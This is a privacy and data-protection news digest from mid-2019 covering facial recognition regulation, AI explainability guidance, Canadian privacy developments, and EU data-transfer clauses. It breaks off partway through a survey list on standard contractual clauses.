US – Microsoft Quietly Deletes Largest Public Face Recognition Data Set

Microsoft has removed its MS Celeb database from the internet. It was the largest public facial-recognition database in the world, containing 10 million images of 100,000 people. The photos were collected without the consent of their subjects, scraped from search engines and videos under the terms of Creative Commons licenses that allow images to be reused for academic purposes. “The site was intended for academic purposes. It was run by an employee that is no longer with Microsoft and has since been removed,” Microsoft said. Similar databases at Stanford and Duke universities have also been pulled offline. [Financial Times | Microsoft Deleted a Massive Facial Recognition Database, But It’s Not Dead | Microsoft discreetly wiped its massive facial recognition database | Microsoft Quietly Pulls Its Database of 100,000 Faces Used By Chinese Surveillance Companies]

US – Civil Liberties Groups Sound Alarm on Face Surveillance Body Cameras

The ACLU of California and a diverse coalition of civil rights, racial justice, and digital privacy organizations sent a joint letter urging the California Senate Public Safety Committee to support AB 1215: The Body Camera Accountability Act [read ACLU fact sheet]. The bill aims to prevent California law enforcement from adding real-time facial-recognition technology to officer-worn body cameras for use against the public. The Senate Public Safety Committee is scheduled to vote on AB 1215 on June 11th [agenda]. Facial-recognition technology suffers from serious accuracy and bias issues, according to multiple studies, and has been repeatedly demonstrated to misidentify women, young people, and people of color. Last year, the ACLU ran photos of members of Congress through Amazon’s “Rekognition” face surveillance product and found that 28 members of Congress were incorrectly matched with mugshot booking photos of arrestees [read blog post], including former California legislators Mark DeSaulnier, Steve Knight, Jimmy Gomez, and Norma Torres. A disproportionate number of these false matches were lawmakers of color. The bill recognizes that even completely accurate facial recognition would subject the public to unprecedented tracking and further undermine the purpose of body cameras: to monitor officer conduct, not to track the identity and movements of Californians. Californians strongly support the policies in AB 1215, according to a poll of likely 2020 California voters: 82% believe the government shouldn’t be able to monitor and track who we are and where we go using our biometric information; 63% oppose adding biometric surveillance to public video cameras to identify and track the public; and 62% believe that body cameras should be a tool for public oversight and accountability of police, not for surveillance of the public. Oregon and New Hampshire already prohibit the use of face recognition with body cameras. The San Francisco Board of Supervisors has voted to prevent the use of face recognition technology by city departments. Oakland and Berkeley are considering similar legislation. Legislators in Massachusetts, Michigan, and Washington have all introduced legislation putting some form of a halt on the government’s use of these systems. If approved by the Senate Public Safety Committee, AB 1215 would then head to the Senate Floor for approval. [ACLU of Northern California | California Considering a Ban on Realtime Police Body Camera Facial Recognition | California considers ban on facial recognition’s new frontier: police body cameras]

US – Amazon Joins Call for Regulation of Facial-Recognition Tech in US

Amazon Web Services CEO Andy Jassy said that his company supports and desires federal regulation on the misuse of facial-recognition software. Amazon joins fellow tech companies, including Microsoft and Google, that are calling for more policing of the tech. “Whether it’s private-sector companies or our police forces, you have to be accountable for your actions and you have to be held responsible if you misuse it,” Jassy said. “I think the issue around facial-recognition technology is a real one.” Amazon has received criticism for its facial-recognition software, Rekognition, but Jassy said his company wants to ensure the tech is being used lawfully at all times. Efforts by the U.S. Congress to limit or ban facial-recognition software are ongoing. According to Government Technology, U.S. Sen. Ed Markey, D-Mass., is calling on the Department of Homeland Security to stop using the facial-recognition software. [The Seattle Times]

US – NY Bill Would Postpone Facial Recognition in Schools

A bill banning the use of facial-recognition technology in New York schools for a year has advanced to the state Assembly’s Standing Committee on Ways and Means. Legislators believe the state’s Department of Education should study the technology more closely before it is implemented in schools. “This issue needs to be explored further as we seek to balance safety and privacy of our schoolchildren, especially in respect to these new and emerging technologies to avoid issues of bias and serious concerns regarding data storage,” Don Kaplan, a spokesman for Gov. Andrew Cuomo, D-N.Y., said in a statement. This comes on the heels of New York’s Lockport City School District announcing the use of facial-recognition technology in schools beginning in September. [Government Technology]

CN – Increased Use of Facial Recognition in China Poses Privacy Risks

China is enjoying the benefits and simplification brought forth by the growing use of facial-recognition technology, but such booming growth also comes with privacy concerns. As the technology evolves, it is becoming more invasive and collecting more data, leading Chinese legal analysts to believe improved legislation is necessary to regulate the growth. Acting on regulation now could be crucial as further expansion of facial-recognition tech is on the horizon. Shenzhen-based Qianzhan Industry Research Institute has done studies that predict the market for facial recognition in China will grow 20% over the next five years and have 10 billion yuan committed to the tech by 2024. [The Straits Times]

AU – Facial-Recognition Tech at Queensland Stadiums Sparks Privacy Concerns

Stadiums Queensland, owner of nine sporting and entertainment venues in the Australian state, has quietly begun trials of facial-recognition technology at its locations. An SQ spokeswoman said the software is in place “to identify patterns and anomalies in crowd behaviour such as abandoned bags or long queues.” The low-profile rollout has drawn the attention of Queensland Privacy Commissioner Philip Green, who said the public deserves more information about SQ’s implementation and that privacy impact assessments are necessary. “It’s simply good practice to identify risks of conducting this sort of surveillance and using facial recognition — those risks are being identified worldwide at the moment,” Green said. “It’s been demonstrated that bias can creep in, depending on what databases you’re using and who’s in the database, and the algorithms themselves.” [ABC News]

Big Data | Data Analytics | Artificial Intelligence

US – Government Agencies Roll Out ‘Federal Data Strategy’

Four U.S. government agencies have collaborated on a draft of the “Federal Data Strategy Year-1 Action Plan,” which seeks to “align existing efforts and establish a firm basis of tools, processes, and capacities to leverage data as a strategic asset.” The Office of Management and Budget, Office of Science and Technology Policy, Department of Commerce and Small Business Administration were each involved in the plan’s crafting. The inaugural plan will implement the base of the Federal Data Strategy through 16 fundamental steps that work toward the preliminary goal of improving data management across government entities. The publishing agencies also set a July 5 deadline to submit feedback on the plan. [Data.Gov]

UK – ICO Releases Interim Report for AI Guidance Project

On June 3, 2019, the UK Information Commissioner’s Office (ICO) released an Interim Report on “Project ExplAIn”, a collaboration with The Alan Turing Institute. The purpose of this project is to develop “practical guidance” for organizations on complying with UK data protection law when using artificial intelligence (AI) decision-making systems; in particular, on explaining the impact AI decisions may have on individuals. It may be of particular relevance to organizations considering how to meet transparency obligations when deploying AI systems that make automated decisions falling within the scope of Article 22 of the GDPR [ICO guidance]. The report summarizes the results of recent engagements with public and industry stakeholders on how best to explain AI decision-making, which in turn will inform the ICO’s development of guidance on this issue. The research was carried out using a “citizens’ jury” method to gauge public perception of the issues, and through roundtables with industry stakeholders represented by data scientists, researchers, Chief Data Officers, C-suite executives, Data Protection Officers, lawyers and consultants. Following the results of the research, the Interim Report provides three key findings:

1) the importance of context in providing the right type of explanations for AI;

2) the need for greater education and awareness of AI systems; and

3) the challenges of providing explanations (such as cost, commercial sensitivities, and lack of internal accountability within organizations).

The Interim Report provides a list of contextual factors that the research found may be relevant when considering the importance, purpose and explanations of AI decision-making [see p. 23]. In terms of next steps, the ICO plans to publish a first draft of its guidance over the summer, which will be subject to public consultation. Following the consultation, the ICO plans to publish the final guidance later in the autumn. The Interim Report concluded three possible implications for the development of the guidance:

1) there is no one-size-fits-all approach for explaining AI decisions;

2) the need for board-level buy-in on explaining AI decisions; and

3) the value in a standardized approach to internal accountability to help assign responsibility for explainable AI decision-systems.

The Interim Report offers a taster of what’s to come by setting out the currently planned format and content for the guidance, which focuses on three key principles:

(i) transparency;

(ii) context; and

(iii) accountability.

It will also provide guidance on organizational controls (such as roles, policies, procedures, and documentation), technical controls (such as on data collection, model selection and explanation extraction), and on the delivery of explanations. The ICO plans to finalize its AI Auditing Framework in 2020, which will address the data protection risks arising from AI systems. [Inside Privacy (Covington) | AI Auditing Framework Blogspot]

EU – New Study Probes Rules on Automated Decision Making

The Privacy and Data Protection Journal has published an article by Duc Tran, a Senior Associate in Herbert Smith Freehills’ Digital TMT, Sourcing & Data Team, exploring automated decision making under the General Data Protection Regulation; read “Probing the rules on automated decision making“. Some organisations have sought to automate and optimise their operations and decision-making processes using new technologies such as AI and machine learning. However, whilst the efficiency gains and other benefits may be considerable, it is important for these organisations to be aware of the legal implications of using such technology. One of these considerations is the GDPR’s restriction on the use of machines and automated systems to make decisions about individuals. GDPR Article 22 seeks to protect individuals from having important decisions (those with a legal or ‘similarly significant’ effect) made about them by solely automated means (“automated decision making”). Indeed, automated decision making is only permitted under Article 22 in certain, limited situations. However, there is a significant amount of ambiguity surrounding the application of the rules on automated decision making, including in relation to when a given process will amount to automated decision making for the purposes of Article 22. The article explores this ambiguity, applying the following issues to real-world decision-making processes:

1) The meaning of ‘similarly significant effect’;

2) When a decision is deemed ‘solely automated’; and

3) The level of human intervention required to take a decision outside the scope of Article 22, and whether this human intervention can take place at the ‘input’ or ‘output’ stage of a given decision making process.

Further guidance on automated decision making is available on the UK ICO’s AI Framework blog [read here]. [Data Notes (Herbert Smith Freehills) | ICO’s Interim Report on Explaining AI | ICO blogs on meaningfulness of human involvement in AI systems]

WW – Using Big Data to Fight Human Trafficking

Working with the Polaris Project, Enigma is trying to combat human trafficking through the Stand Together Against Trafficking project. Enigma Co-Founder and CEO Hicham Oudghiri discussed the effort during a recent conference in New York City. According to a Forbes article from earlier this year, “To date, Enigma has synthesized 100,000 data sets in more than 100 countries, organized intelligence on 30 million small businesses and accumulated 140 billion points of data on the U.S. population.” In the interview, Oudghiri discusses how the company uses that data, including sharing it to prevent human trafficking. The program is currently running with a restricted set of partners while Enigma fine-tunes the parameters of the project. [PC Magazine]

US – NY Poised to Pass First Bill Governing Use of Artificial Intelligence

New York is preparing to pass its first law governing artificial intelligence, which would establish a commission to study the technology. The proposed bill stems from the need for the law to catch up with the use of automation in the modern workforce. If passed, the commission would include various stakeholders in AI. It would evaluate the impact of AI in eliminating jobs statewide and the need to protect confidential information, as well as consider “potential restrictions … [and] criminal and civil liability regarding violations of law caused by entities with artificial intelligence, robotics and automation,” according to the bill. [GovTech]

US – FPF Launches Group to Support, Study Privacy-Protective Data Sharing

The Future of Privacy Forum has announced the creation of the Corporate-Academic Data Stewardship Research Alliance, a peer-to-peer network of private companies that seeks to ease privacy-protective data sharing between businesses and academic researchers. More than 25 companies have already joined the new initiative, which will strive to support and promote data sharing for academic research while addressing the ethical, policy and legal issues such sharing raises. Working under the common theme of understanding the legalities of data sharing, the alliance has already identified a lack of contractual uniformity and limited access to ethics review boards as issues plaguing companies’ efforts to share data properly. [FPF.org]

CA – Dr. Ann Cavoukian Lends Privacy Expertise to D-ID Advisory Board

Privacy by Design framework creator Dr. Ann Cavoukian has joined D-ID’s [here & PR here] advisory board to share her privacy expertise, the biometric facial recognition-blocking company has announced. Cavoukian is a three-term Privacy Commissioner for the Canadian province of Ontario, and is currently the Executive Director of the Global Privacy & Security by Design Centre. “We are thrilled and honored to welcome Ann to our Advisory Board,” comments D-ID Co-founder and CEO Gill Perry. “Her rich experience and deep understanding of privacy regulation will be a huge asset for us as we continue to advance our revolutionary facial-recognition blocking platform.” “Our face is among the most sensitive biometrics in existence,” says Cavoukian. “If a facial image is obtained without consent, it can easily be compromised, resulting in devastating occurrences such as identity theft. Technologies such as D-ID’s can greatly protect facial images and take individuals and organizations out of harm’s way.” Cavoukian recently criticized Toronto Police for a lack of transparency in their use of facial recognition [read CBC coverage here]. D-ID won a 2019 Netexplo award in April, and is also presenting its deep-learning facial image shielding technology at Identity Week 2019 in London. [Biometric Update]

Canada

CA – OPC Consultation on Transfers for Processing Resumes

On June 11, the Office of the Privacy Commissioner of Canada (OPC) announced that it is resuming its Consultation on transfers for processing with a Reframed Discussion Document that consolidates and supersedes the OPC’s original Consultation document of April 9, 2019 and its Supplementary Discussion Document of April 23rd, 2019. The new “stand-alone” paper reframes the consultation to invite stakeholder views on not only how the current law should be interpreted, but also how a future law should provide effective privacy protection in the context of transfers for processing in light of the recent adoption of Canada’s Digital Charter, and the Federal Government’s proposals for amending PIPEDA (Strengthening Privacy for the Digital Age). In addition to the original questions posed in the Supplementary Discussion Document of April 23rd — which remain the same — the OPC is also inviting submissions on these three more “future-oriented” questions:

  • How should a future law effectively protect privacy in the context of transborder data flows and transfers for processing?;
  • Is it sufficient to rely on contractual or other means, developed by organizations and reviewed only upon complaint to the OPC, to provide a comparable level of protection? Or should a future law require demonstrable accountability and give a public authority, such as the OPC, additional powers to approve standard contractual clauses before they are implemented and, once they are adopted, proactively review their implementation to ensure a comparable level of protection?; and
  • How should a future law effectively protect privacy where contractual measures are unable to provide that protection?

The new deadline for submissions on the Reframed Discussion Document on Transfers for Processing is now August 6, 2019. AccessPrivacy will be discussing this most recent development in greater detail during its next Monthly Call on June 19th, 2019 at 11:30 a.m. EDT. [details] [AccessPrivacy (Osler) | Consultation on transfers for processing – Reframed discussion document | Privacy commissioner suspends consultation following Equifax data breach, say lawyers | Is Data Residency Coming to Canada? The OPC Signals a Major Change to its Policy Position on Transborder Dataflows (4 pg PDF) | Canada’s Privacy Commissioner Recommends Consent for Cross Border Data Transfers | The battle over data localization | The many lessons of the Equifax data breach | Rewriting Canadian privacy law: Commissioner signals major change on cross-border data transfers | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing]

CA – CBSA Investigates After Licence Plate Reader Linked to U.S. Hack

Photos of travellers and licence plates collected by U.S. Customs and Border Protection [CBP] were compromised in a privacy breach last month [read W.P. coverage]. The Canada Border Services Agency [CBSA] and CBP use the same plate reader technology. CBP said it learned of the data breach, which affected fewer than 100,000 people, at the end of May. A subcontractor transferred copies of images to its company network without the agency’s authorization, violating U.S. government policy, American officials said. Now the CBSA has launched its own investigation. “We are currently reviewing and assessing what impacts, if any, this breach has on our operations and Canadians. While the CBSA awaits the completion of the forensic investigation, our information at this time is that this incident does not pose systems or security vulnerabilities,” said CBSA spokesman Nicholas Dorion in an email to CBC. The office of the federal privacy commissioner said it’s reaching out to the CBSA for more information. Public Safety Minister Ralph Goodale, whose portfolio includes the border agency, said he’s concerned about the breach: “(CBSA is) investigating that whole situation from top to bottom. To this point, there have not been serious implications for CBSA’s information, but obviously CBSA is concerned about the quality of the services that are provided to it and they are investigating all the ramifications.” [CBC News | US Customs and Border Protection says traveler images were taken in cyberattack | CBP says photos of U.S. travelers, license plate images were stolen in data breach | CBP says traveler photos and license plate images stolen in data breach]

CA – Canada’s Military Spies Can Collect, Share Info on Canadians: Directive

The Canadian Press recently obtained a copy of the eight-page, August 2018 directive, “Guidance on the Collection of Canadian Citizen Information,” through the Access to Information Act. It says Canada’s military spies can collect and share information about Canadian citizens — including material gathered by chance. The instruction to National Defence employees and members of the Canadian Forces says any information collected about Canadians must have a “direct and immediate relationship” to a military operation or activity. The guidance also says data about Canadians, whether collected intentionally or scooped up inadvertently from open sources such as social-media feeds, may be kept and used to support authorized defence-intelligence operations. The prospect of defence-intelligence agents having personal data about Canadians worries civil-liberties advocates, because it is unclear just how much could be collected incidentally from the vast reaches of cyberspace. The national-security and intelligence committee of parliamentarians is examining the directive as part of a study on how National Defence and the Canadian Forces gather, use, keep and share information about Canadians as part of their intelligence work. It plans to deliver a special report to the prime minister on the subject this year. It will be a follow-up to an April report from the committee that said the military has one of the largest intelligence programs in Canada, and it gets little outside scrutiny. It said these activities involve considerable risks, including infringements of Canadians’ rights. The committee called for stricter controls on the military’s spying, including the possibility of legislation spelling out when and how defence intelligence operations can take place. [CBC News | The Canadian Military Is Actually Allowed Take And Share Information From Your Phone]

CA – Directive Allows Canadian Surveillance Agencies to Gather Citizen Data for Legitimate Investigations

An August 2018 federal directive states Canadian surveillance agencies can collect and share citizens’ data as part of legitimate investigations. The “Guidance on the Collection of Canadian Citizen Information” directive states any information gathered on Canadian citizens must have a “direct and immediate relationship” to an investigation; however, “emerging technologies and capabilities” could result in inadvertent data collection. The National Security and Intelligence Committee of Parliamentarians plans to send a special report on the directive to the prime minister this year. Meanwhile, a Mountie from British Columbia violated provincial law when he investigated the background of a protestor and leaked his findings to municipal officials. [The Canadian Press]

CA – OIPC NS Releases 2018-2019 Annual Report

On June 5, Catherine Tully, Nova Scotia’s Information and Privacy Commissioner, released her annual report for 2018-2019. This year marks the 25th anniversary of the Office of the Information and Privacy Commissioner. The report argues that, with the rapid development of technology and its capacity to process enormous volumes of information, particularly personal information, a watchdog for access to information and privacy rights has never been more necessary. Over the last 25 years, the office has become a trusted voice in Nova Scotia: more than a thousand citizens call it each year with concerns about their access and privacy rights; hundreds of public bodies, municipalities and health custodians seek its advice, recommendations and guidance on the complex access and privacy issues that arise in the digital age; and thousands of Nova Scotians attend OIPC-led presentations on issues ranging from big data to privacy breach management to open government. Nova Scotians, through their desire for transparency, accountability and knowledge, have helped transform the office from a small, yet important, operation which dealt almost exclusively with access to information appeals into an influential, dynamic and proactive democratic institution. When the first commissioner was appointed 25 years ago, clouds were only in the sky, cities were dumb and discs were floppy; today, the office handles complex files reflective of the opportunities and challenges of the modern world, providing advice on issues ranging from the privacy risks of facial recognition, cloud storage and smart cities to managing the accountability obstacles inherent in modern data communication and storage technology. The 2018-2019 Annual Report includes details of the extraordinary increase in the caseload of the office and the challenges it faces with very limited resources. The Service Plan, included with the report, highlights a number of concerning trends in Nova Scotia. Commissioner Tully concludes by noting, “The future of access and privacy rights in Nova Scotia depends on us keeping pace with technology and ensuring that our rights are subject to meaningful and effective oversight. It will take courage and determination on the part of politicians and likely a push from the public to bring our access and privacy laws into the 21st century.” [Office of the Information and Privacy Commissioner | Nova Scotia only ‘fully accepted’ 40 per cent of information czar’s findings last year: report | Nova Scotia information and privacy watchdog cites concerning trends in government performance | At least 865 privacy breaches of Nova Scotia medical records in past year: watchdog | Swamped information commissioner again chides McNeil government | Federal politicians could soon face B.C. privacy watchdog over party databases]

CA – Privacy Expert Ann Cavoukian: Federal ‘Digital Charter’ Is Pre-Election Posturing

Former Ontario privacy commissioner Ann Cavoukian said she’s in favour of the federal government’s recently announced “digital charter” [read PR, overview & minister’s message] but thinks it should have been brought out long ago, arguing that, if the government was serious about protecting Canadian privacy and digital rights, it would have acted last year or the year before. “It’s talk. It’s for show. And that’s what upsets me, because the government had a real chance of making this a reality and they chose not to do that,” Cavoukian said. “That’s what I object to, not the contents of the digital charter. If this was real, it would have been done last year or the year before.” Cavoukian was commenting at the annual Canadian Telecom Summit in Mississauga, Ont. Innovation Minister Navdeep Bains, who is responsible for the digital charter as well as telecommunications, will speak at the same conference on Wednesday. A member of Bains’ staff said by phone that the minister understands Cavoukian’s position but feels the government updated one of Canada’s privacy laws last year and plans to do more in future. [The Toronto Star | Canada’s Digital Charter does not comfort Alphabet’s smart-city critics | Opinion: Politicians say they care about privacy. So why can political parties ignore privacy law? | Five reasons Canada’s Digital Charter will be a bust before it even gets going | FUREY FACTOR Downloading Trudeau’s digital charter – is it too vague? (video) | KINSELLA: Trudeau needs to practice what he preaches | Give Canadians privacy rights in new law, says federal privacy commissioner | Canada’s Digital Charter: How to give it teeth | Canada’s digital charter represents a sea change in privacy law, but several unaddressed issues remain | Minister Bains announces Canada’s Digital Charter | Canada announces Digital Charter, promises serious fines to business for not protecting privacy | Trudeau government unveils plans for digital overhaul | Ottawa launches data strategy, eyes fines tied to tech giants’ revenue Subscriber content]

CA – OPC Suspends Consultation Following Equifax Data Breach

In late May, Privacy Commissioner of Canada Daniel Therrien told lawyers and chief privacy officers that his office would suspend its consultation on transborder dataflows, which was announced [see PR & details] on April 9 after an investigation into Equifax and Equifax Canada Co.’s compliance with PIPEDA. In his April 9 announcement the commissioner said: “An investigation into a global data breach has found that both Equifax Canada and its US-based parent company fell far short of their privacy obligations to Canadians.” The OPC pledged that, as a result, a formal consultation would be held, “soliciting feedback and updating its guidance on cross-border transfers of personal information. We believe individuals would generally expect to know whether and where their personal information may be transferred or otherwise disclosed to an organization outside Canada,” said the OPC. In 2009, the OPC had said that a “transfer” is not to be confused with a “disclosure” of personal information, because a transfer of information “can only be used for the purposes for which the information was originally collected” [read guidance]. The OPC’s Equifax investigation reversed that, and said that “transfers for processing from Equifax Canada to Equifax Inc. constitute disclosures of personal information under the meaning of PIPEDA” [see here]. The news caused widespread dismay, say lawyers. Halifax privacy lawyer David Fraser says the April 9 consultation announcement “came out of nowhere and it wasn’t just a consultation because in fact it was begun by them saying, ‘We are completing re-writing our approach to cross-border data flows and all outsourcing, to a 180 degree turn away from the guidance that my predecessor (former Privacy Commissioner of Canada Jennifer Stoddart) gave in 2009, and we’re completely reinterpreting our statutes in a way that the statute won’t bear, but please give us your comments.’” His take was that “this consultation was ill-conceived from the get-go.” Fraser says the immediate reaction to the news was “overwhelmingly negative, even bringing into question Therrien’s respect for the rule of law and parliamentary supremacy.” “I think he was looking for a way to walk this back,” he says. “And I think the digital charter announcement [see PR & gov’t overview] and proposals for privacy law reform contained in that, gave him cover to do that.” Fraser says he was not present at the meetings in Toronto last week where the suspension of the consultation was announced, but says the privacy bar was abuzz with the news. David Elder, chair of the communications and privacy and data protection groups at Stikeman Elliott LLP in Ottawa, says that the privacy commissioner’s findings in the initial investigation of the Equifax breach would have made Canada an outlier in terms of privacy law, particularly on the distinction between uses and disclosures of data when outsourcing, and the consent needed to transfer personal information. Now, if the consultation is cancelled without addressing the OPC’s findings, the business community might find the law “unworkable,” says Elder. He says that lawyers are confused about whether to advise their clients to stop working on submissions for the consultation. “There is a considerable amount of uncertainty in the commissioner’s verbal announcement that he was suspending the announced consultation. The part that wasn’t clear is, ‘What does suspending mean? Will it be revived, and if so when, and what does it cover?’” says Elder.
As recently as May 15, the OPC said it was extending the deadline for comments about the consultation until Friday, June 28, 2019, and that, given the consultation period, the office did “not expect organizations to change their practices at this time.” The Office of the Privacy Commissioner still says on its website that it is planning to update its Guidelines for Processing Personal Data Across Borders based on the now-defunct consultation. Adam Kardash, the chair of Osler, Hoskin & Harcourt LLP’s national privacy and data management practice and co-lead of AccessPrivacy, says there was almost unanimous disagreement with the OPC’s legal position. “The issues raised by the consultation have significant broad-based policy implications with highly adverse practical implications for organizations [in] all sectors,” he says. “[T]he discussion is best suited as part of the statutory reform discussions regarding the amendment to PIPEDA, which were just recently announced by the federal government with its announcement of the Digital Charter. The commencement of the trans-border data flow consultation, it was like a metaphorical bomb in the privacy arena,” says Kardash. [Canadian Lawyer Magazine]

CA – Québec Private Sector Privacy Act: When Does It Apply Outside of Québec?

The territorial application of Québec’s Act Respecting the Protection of Personal Information in the Private Sector [PDF] remains to be settled by legislation or jurisprudence. While Courts have identified the criteria used to ascertain the existence of an enterprise, they have yet to develop a clear approach to the application of the Act to foreign enterprises with activities in the province of Québec. The lengthy blog post discusses how Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA) [see OPC here] and the EU General Data Protection Regulation (GDPR) may provide models that could be considered in Québec. However, until the territorial scope of the Act is clarified, organizations may find that the Act applies to their activities in unexpected ways, as has occurred in a number of cases, discussed in the post, where there were only minimal connections to Québec. While Québec Courts have delineated the scope of the province’s Private Sector Privacy Act through the notion of “enterprise,” they have yet to delineate the scope of the Act’s territorial application. Determining the territorial application of Québec privacy legislation thus remains unsettled and unclear. In contrast, to determine the application of PIPEDA, practitioners benefit from jurisprudence that applies an established method to ascertain its territorial application, i.e. the “real and substantial connection” test. To do the same for EU privacy legislation, practitioners can consult legislative provisions and detailed guidance documents. [Mondaq]

Consumer

CA – Only 9% of Canadians Know Political Parties are Exempt from Privacy Laws

A survey commissioned by the Centre for Digital Rights found only 9% of Canadian citizens knew political parties are not covered under the country’s privacy laws. Of the 1,471 Canadian voters polled, 85% said they did not know about the exemption, and 7% said they were not sure. After they were told about the current setup, 65% said they strongly agreed political parties should be covered by the privacy laws other organizations follow in Canada, with another 23% who said they somewhat agree. In April, Federal Privacy Commissioner Daniel Therrien and Chief Electoral Officer Stéphane Perreault urged parties to set a high bar with their policies and released suggestions as to what a strong policy should contain [see PR & “Guidance for federal political parties on protecting personal information“]. They said parties should obtain meaningful consent for the collection and use of personal information, and that parties should not assume Canadians are consenting to have their information included in a party database simply because they may like a party’s post on social media. [The Globe and Mail | Get meaningful consent when collecting voter data, federal parties told | Federal parties urged to bolster privacy protections beyond what the law requires ahead of 2019 election | New privacy guidelines issued for political parties in wake of blanket text messages | Canada’s political parties should respect citizen’s privacy rights, watchdog says | Can politicians send you unsolicited text messages? Here are the rules in Canada | The Globe and Mail]

UK – Survey Shows UK Distrust, Value in Protecting NHS Data

A YouGov survey revealed 70% of U.K. respondents don’t trust multinational tech giants with National Health Service patient data. In the pool of 2,081 responses, just 13% said they trust multinational big tech companies with the data, while 76% said they could not support the data being analyzed in different countries that carry varying data laws and protections. The survey also polled 102 members of Parliament, 58% of whom stated they would want their information handled by U.K.-based companies, while 80% want NHS data to be protected and valued by the government. “It is absolutely crucial patient data is always protected to the highest standards and the Government has introduced new legislation to support this,” a spokesperson for the Department of Health and Social Care said in a statement. [ITV]

WW – Internet Privacy: It’s a Matter of Mental Health

Stanford University professor of psychiatry and behavioral sciences Dr. Elias Aboujaoude argues, in a perspective article for the Journal of Medical Ethics, that we need to think about internet privacy as a mental health issue [see “Protecting privacy to protect mental health: the new ethical imperative“]. “In the popular media there are hundreds of stories about cyberstalking or revenge porn,” he said, noting that some of his patients have suffered from anxiety, depression and post-traumatic stress disorder after their personal details were exposed online. Yet, he said, “I was struck by how little there has been in the medical literature about this issue.” He calls on the U.S. medical community to embrace, on mental well-being grounds, a privacy bill of rights like the European Union’s General Data Protection Regulation. “For years I have approached this issue as a human right and am now putting out this article as a call to action,” he said. “In the medical profession we should be advocating for this right. We have a history, since Hippocrates, of protecting privacy in the doctor-patient relationship. It’s time we insist on broader protections for patients and citizens.” Privacy is a fundamental psychological need: It allows us to recover from harm and develop an individual identity, Aboujaoude said. But on the internet, the entire world can know our most intimate secrets. Aboujaoude said that clinicians can help patients protect their privacy by educating them on how to guard their personal information online. “We do a lot of education with patients — about disease, about trauma, about strategies to restore mental well-being. Internet privacy can fall within that,” he said. He added that studies into the mental health effects of online privacy violations should be a public health priority. “Research into the function of privacy predates the internet,” he said. “New research, in this digital age, is necessary and timely.” [SCOPE blog (Stanford Medicine)]

E-Government

US – U.S. Now Requires Social Media Info for Visa Applications

The U.S. now requires virtually all visa applicants to provide their social media account names for the previous five years. This was proposed in March 2018, and to some extent in 2015. The mandate only covers a list of selected services, although potential visitors and residents can volunteer info if they belong to social sites that aren’t mentioned in the form. Applicants also have to provide previous email addresses and phone numbers on top of non-communications info like their travel status and any family involvement in terrorism. Some diplomats and officials are exempt from the requirements. The U.S. had previously only required these details from people who had visited terrorist-controlled areas. The goal is the same, however. The measure will affect millions of visa seekers each year, although whether or not it will be effective isn’t clear. A State Department official told The Hill that applicants could face “serious immigration consequences” if they’re caught lying, but it’s not certain that they’ll be found out in a timely fashion — the policy is counting on applicants both telling the truth and having relatively easy-to-find accounts if they’re dishonest. And like it or not, this affects the privacy of social media users who might not want to divulge their online identities (particularly private accounts) to government staff. [engadget | ‘Invasion Of Privacy’: U.S. Will Ask For Social Media Handles During Visa Application]

Electronic Records

US – Study Uses Privacy to Help Grade Top Data Management Platforms

Forrester released the findings of “The Forrester Wave: Data Management Platforms, Q2 2019.” The report focused on the top seven data management platforms and graded them based on a set of 34 different categories. Salesforce and Adobe were identified by Forrester as the top DMPs, particularly due to their emphasis on privacy. “Salesforce and Adobe’s goal is to build a privacy-first consent management, with known customer identifiers to facilitate known customer advertising,” Forrester Research Senior Analyst and DMP Wave Co-Author Tina Moffett said. In a blog post, Moffett wrote vendors “are future-proofing their technologies to ensure they’re privacy-focused, with consent management features, despite the data already being pseudonymized.” [AdExchanger]

US – FTC Submits Comment on Proposed Information Blocking Rule

The Federal Trade Commission staff has submitted a comment [read 2 pg PDF comment] to the Department of Health & Human Services’ Office of the National Coordinator for Health Information Technology [ONC] regarding ONC’s proposed rule on “information blocking” [see here & here] The Commission vote approving the comment to the ONC was 3-0-2, with Commissioners Rohit Chopra and Rebecca Kelly Slaughter abstaining. Recognizing that Congress sought to foster greater interoperability between electronic health records systems and the productive flow of electronic health information under the recently enacted 21st Century Cures Act, the FTC staff comment suggests that ONC consider changes to ensure the final rule does not inadvertently distort competition or impede innovation, to the detriment of consumer welfare. The comment includes four suggestions for potential adjustments to the proposed rule, including ONC’s proposed exceptions for “reasonable and necessary activities that do not constitute information blocking for purposes [of the proposed prohibition].” The comment asks ONC to consider:

  • using other, more fully developed examples of permissible conduct in order to clarify genuine safe harbors for conduct that does not harm competition or consumer welfare;
  • adjusting the definition of Electronic Health Information so that it applies more narrowly to the information central to purposes of the authorizing statute, such as information needed for patient treatment and Health Information System interoperability;
  • clarifying when market pricing is not deemed information blocking, and providing additional leeway for market pricing and certain ordinary refusals (or failures) to deal under the “recovering costs reasonably incurred,” “responding to requests that are infeasible,” and the “licensing of interoperability elements on fair and reasonable terms” exceptions; and
  • narrowing the proposed definition of “developers of certified Health Information Technology” to focus on those activities or practices that involve certified Health Information Technology. [US Federal Trade Commission]

EU Developments

WW – Update on EU Standard Contractual Clauses for International Data Transfers

On June 12, 2019, Hunton Andrews Kurth and its Centre for Information Policy Leadership [CIPL] hosted a roundtable discussion in the firm’s Brussels office on the update of the EU Standard Contractual Clauses for international data transfers [SCC – see EC guidance here & here]. More than 30 privacy leaders joined together to discuss the challenges of the current SCCs and provide their insights on the updated versions. Hunton partner David Dumont led the discussion, while CIPL President Bojana Bellamy illuminated CIPL’s work in this area. The session also featured Cristina Monti [Twitter here], Policy Officer in the International Data Flows and Protection Unit of the EU Commission DG Justice and Consumers. The seminar attracted a range of privacy professionals who responded to a quick survey regarding their preferred data transfer mechanisms and their experiences with SCCs. Key takeaways from this survey include:

  • 77% of the participating companies rely on SCCs to legitimize data transfers outside of the European Economic Area, 14% of the participants transfer personal data based on the European Commission’s adequacy decisions (including the decision recognizing the EU-U.S. Privacy Shield framework as providing adequate protection), and only 9% have put in place Binding Corporate Rules;
  • 52% of the participating companies have more than 100 SCCs in place, 39% have 10-100 SCCs in place, while 9% have less than 10 SCCs in place;
  • Out of the three available sets of SCCs, the most frequently used set is the Controller-to-Processor SCCs, which 88% of the participating companies use. None of the participants use the 2001 Controller-to-Controller SCCs;
  • It generally takes either up to three months or up to six months to execute SCCs;
  • The participants’ biggest challenge in executing or maintaining SCCs was multiparty contractual scenarios and the qualification of the data importer as a data controller or data processor;
